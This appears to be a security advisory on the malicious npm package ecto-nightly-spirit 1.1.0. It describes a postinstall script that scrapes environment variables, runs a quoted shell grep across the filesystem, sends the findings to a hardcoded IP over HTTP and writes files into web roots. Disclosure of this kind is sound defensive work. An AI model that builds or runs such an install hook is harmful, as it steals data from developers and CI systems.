ecto-nightly-spirit @1.1.0

Summary

On npm install , postinstall.js executes unconditionally and performs three installer-harming actions. (1) It enumerates every key/value pair in process.env and scans for HTB{...} flag patterns (postinstall.js:42-45). (2) It reads a hardcoded list of absolute filesystem paths (/flag.txt, /root/flag.txt, /app/flag.txt, etc.) and shells out via /bin/sh -c 'grep -Rao 'HTB{[^}]*}' /app /tmp /root /home /opt /usr/src' to recursively scan the installer's filesystem (postinstall.js:65). (3) It HTTP-PUTs the discovered string (or a NOFLAG uid=... cwd=... fallback containing host identifiers) to the hardcoded bare-IP endpoint http://154.57.164.70:30569/api/modules/ECT-472839 over plain HTTP. Additionally, postinstall.js:13-25 /:104-109 writes attacker-chosen content into common web document roots (/usr/share/nginx/html/flag.txt, /var/www/html/flag.txt, /app/public/flag.txt, etc.), creating a public leak channel on any installer machine that also serves a webroot. Although the package self-describes as a 'CTF payload for verdaccio supply-chain testing', publishing it to the public npm registry exposes any installer (CI runner, developer machine, container build) to environment scraping, filesystem search, host-info exfiltration, and webroot poisoning.

Source: amazon-inspector (5dea0702101217f4a918a23191023bbd9e7d3b5478028bb0868341a574526e97)